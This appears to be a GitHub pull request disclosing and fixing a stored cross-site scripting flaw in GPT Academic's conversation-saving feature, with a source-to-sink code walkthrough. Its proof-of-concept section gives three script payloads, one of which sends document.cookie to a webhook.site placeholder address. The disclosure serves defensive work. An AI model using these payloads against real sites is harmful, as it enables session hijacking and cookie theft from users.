Fixed XSS in unescaped chat input #2196

geckosecurity · 2025-05-11T21:22:26Z

Version: Latest

An XSS exists in the conversation history feature of GPT Academic. This allows users to save chat conversations as HTML files, but fails to properly sanitize user input before storing it in these files. When these HTML files are later accessed through the application's /file endpoint, any malicious JavaScript embedded in the conversation executes in the victim's browser.

The vulnerability occurs in the write_chat_to_file() function in crazy_functions/Conversation_To_File.py, where user-controlled content from both questions and answers is directly interpolated into HTML templates without any sanitization or escaping. This creates a persistent XSS where an attacker can craft malicious inputs, save them as conversation files, and share the resulting URLs with victims.

Source-Sink Analysis

Source: User-controlled input in the chat interface
- Input is received in the chatbot parameter of write_chat_to_file()
- Both question and answer fields can contain malicious content

Transformation: Unsanitized processing in write_chat_to_file()

# From crazy_functions/Conversation_To_File.py
for i, contents in enumerate(chatbot):
    question, answer = contents[0], contents[1]
    if question is None: question = ""
    try: question = str(question)
    except: question = ""
    if answer is None: answer = ""
    try: answer = str(answer)
    except: answer = ""
    CHAT_PREVIEW_BUF += qa_from.format(QUESTION=question, ANSWER=answer)

No input validation or sanitization is performed
Raw user input is directly inserted into HTML using string formatting

Storage: HTML file creation

with open(fp, 'w', encoding='utf8') as f:
    html_content = form.format(CHAT_PREVIEW=CHAT_PREVIEW_BUF, HISTORY_PREVIEW=HISTORY_PREVIEW_BUF, CSS=advanced_css)
    f.write(html_content)

Malicious HTML/JavaScript is written to a file with a predictable naming pattern

File Access: The /file endpoint in shared_utils/fastapi_server.py serves these HTML files

@gradio_app.get("/file={path_or_url:path}", dependencies=dependencies)
async def file(path_or_url: str, request: fastapi.Request):
    # ... (authorization checks)
    return await endpoint(path_or_url, request)

Sink: Browser execution
- When the HTML file is accessed, any embedded JavaScript executes in the victim's browser context

Proof of Concept

XSS Payload 1:

In the input box, enter the following XSS payload:

<script>alert("Stored XSS Vulnerability in Conversation History")</script>

Submit the payload by clicking the "提交" (Submit) button
Click the "保存当前的对话" (Save current conversation) button
Note the filename (e.g., "GPT-Academic对话存档2023-XX-XX-XX-XX-XX.html")

Access the stored HTML file via:

http://localhost:22303/file=gpt_log/default_user/chat_history/GPT-Academic对话存档2023-XX-XX-XX-XX-XX.html

When the file loads, the JavaScript alert will execute, confirming the vulnerability

XSS Payload 2:

In the chat input box, enter:

Test Text <img src=x onerror="alert('XSS with cookie: ' + document.cookie)">

Follow the same steps as above to save and access the conversation file
The JavaScript in the onerror attribute executes when the image fails to load

XSS Payload 3:

To demonstrate the potential for data theft, use a payload that makes a request to an external server:

<img src="https://webhook.site/YOUR-UNIQUE-ID?cookie="+document.cookie style="display:none">

Replace YOUR-UNIQUE-ID with a unique identifier from webhook.site or a similar service.

Impact

An attacker can:

Execute arbitrary JavaScript in victims' browsers
Steal sensitive cookies and authentication tokens
Perform unauthorized actions with victims' privileges
Access sensitive browser data such as localStorage contents

fix: remediated XSS

0a1f36c

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Fixed XSS in unescaped chat input #2196

Fixed XSS in unescaped chat input #2196

geckosecurity commented May 11, 2025

Uh oh!

Uh oh!

Fixed XSS in unescaped chat input #2196

Are you sure you want to change the base?

Fixed XSS in unescaped chat input #2196

Conversation

geckosecurity commented May 11, 2025

Source-Sink Analysis

Proof of Concept

XSS Payload 1:

XSS Payload 2:

XSS Payload 3:

Impact

Uh oh!

Uh oh!